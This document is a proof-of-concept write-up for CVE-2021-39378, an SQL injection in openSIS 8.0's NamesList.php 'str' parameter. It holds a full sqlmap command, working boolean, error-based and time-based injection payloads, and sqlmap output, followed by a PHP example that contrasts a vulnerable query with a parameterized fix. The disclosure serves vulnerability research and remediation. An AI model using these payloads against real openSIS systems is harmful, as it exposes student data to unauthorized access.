
CVE-2021-39378 PoC — Open Solutions For Education openSIS SQL injection vulnerability

Source
Associated Vulnerability
Title: Open Solutions For Education openSIS SQL injection vulnerability (CVE-2021-39378)
Description: Open Solutions For Education openSIS is an open-source student information system from the US company Open Solutions for Education. openSIS 8.0 contains an SQL injection vulnerability that stems from the database-backed application failing to validate externally supplied input before using it in SQL statements. An attacker can exploit it to execute unauthorized SQL commands.
Readme
# OPENSIS 8.0 SQL INJECTION VULNERABILITY CVE-2021-39378

An SQL injection vulnerability exists in version 8.0 of openSIS when MySQL (MariaDB) is used as the application database. An attacker can issue SQL commands to the MySQL (MariaDB) database through the vulnerable `str=` GET parameter, because its value is placed into a `LIKE` clause without parameterization.

Vulnerable PHP page:

```
NamesList.php
```

sqlmap command used to confirm the injection (the vulnerable parameter is `str`; the session cookie shown is the tester's own):

```
sqlmap -u "http://localhost:8081/NamesList.php?str=J&block_id=1" --cookie="PHPSESSID=s8n71sv8ji77mdjkmh6cj1ik5d; miniSidebar=0" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" --referer="http://localhost:8081/Modules.php?modname=miscellaneous/Portal.php&failed_login=0" --delay=0 --timeout=30 --retries=0 --dbms="MySQL" --level=3 --risk=3 --threads=8 --time-sec=5 -b --current-db --batch --answers="crack=N,dict=N,continue=Y,quit=N"
```

sqlmap output confirming the injection against http://localhost:8081/NamesList.php (three injection techniques were identified on the same parameter):

```
Parameter: str (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: str=J%' AND 4830=4830 AND 'mmPI%'='mmPI&block_id=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: str=J%' AND (SELECT 5261 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(5261=5261,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'YfUK%'='YfUK&block_id=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: str=J%' AND (SELECT 9071 FROM (SELECT(SLEEP(5)))hYUR) AND 'vbOt%'='vbOt&block_id=1

[18:41:23] [INFO] testing MySQL
[18:41:23] [WARNING] reflective value(s) found and filtering out
[18:41:23] [INFO] confirming MySQL
[18:41:23] [INFO] the back-end DBMS is MySQL
[18:41:23] [INFO] fetching banner
[18:41:23] [INFO] resumed: '10.5.11-MariaDB-1'
web application technology: PHP 7.4.21
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.5.11-MariaDB-1'
[18:41:23] [INFO] fetching current database
[18:41:23] [INFO] resumed: 'opensis5'
current database: 'opensis5'
```

Discovered by Nathan Johnson, August 2021
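The root cause described above is user input spliced into a `LIKE` clause. The following PHP is an added example, not code from the openSIS project or from this PoC: it shows a NamesList-style lookup written the vulnerable way beside the parameterized way, and feeds both the benign value and the true/false pair behind the boolean-based payload from the sqlmap output. An in-memory SQLite database stands in for MySQL/MariaDB, and the table and column names are assumptions made for the illustration.

```php
<?php
// Added example, not code from the openSIS project or the PoC: the same
// NamesList-style lookup written the vulnerable way and the parameterised way.
// An in-memory SQLite database stands in for MySQL/MariaDB; the table and
// column names are assumptions made for this illustration.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE students (student_id INTEGER PRIMARY KEY, last_name TEXT NOT NULL)");
$db->exec("INSERT INTO students (last_name) VALUES ('Johnson'), ('Smith'), ('Jones')");

// Vulnerable pattern: the request parameter is spliced into the SQL text, so a
// value that closes the quote can append arbitrary conditions to the WHERE clause.
function namesListVulnerable(PDO $db, string $str): array
{
    $sql = "SELECT last_name FROM students WHERE last_name LIKE '" . $str . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: the value is sent as a bound parameter and can never become
// SQL syntax. LIKE metacharacters are escaped as well, so '%' and '_' in the
// input match literally instead of widening the search.
function namesListSafe(PDO $db, string $str): array
{
    $escaped = str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $str);
    $stmt = $db->prepare("SELECT last_name FROM students WHERE last_name LIKE ? ESCAPE '\\'");
    $stmt->execute([$escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Inputs: a normal prefix search, and the true/false pair behind the
// boolean-based payload in the sqlmap output (in the real page these would
// arrive via $_GET['str']).
$benign       = 'J';
$payloadTrue  = "J%' AND 4830=4830 AND 'mmPI%'='mmPI";
$payloadFalse = "J%' AND 4830=4831 AND 'mmPI%'='mmPI";

$variants = ['vulnerable' => 'namesListVulnerable', 'hardened' => 'namesListSafe'];
$inputs   = ['benign' => $benign, 'true-condition' => $payloadTrue, 'false-condition' => $payloadFalse];

foreach ($variants as $label => $fn) {
    foreach ($inputs as $name => $input) {
        $rows = $fn($db, $input);
        printf("%-10s %-15s -> %s\n", $label, $name, $rows ? implode(', ', $rows) : '(no rows)');
    }
}
```

Run with `php example.php` (needs the `pdo_sqlite` extension). The vulnerable function returns the same rows for the benign value and the true-condition payload but nothing for the false-condition payload: that difference in the response is the oracle a boolean-based blind test relies on, and it is what makes the sqlmap result above possible. The hardened function returns the normal rows for the benign value and no rows for either payload, because the bound parameter is only ever a search string, and escaping `%` and `_` keeps attacker-supplied wildcards from matching every row.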
File Snapshot

```
[4.0K] /data/pocs/3604dd12b7066677bddb4aaffc1ec97ccd25e944
└── [2.1K] README.md

0 directories, 1 file
```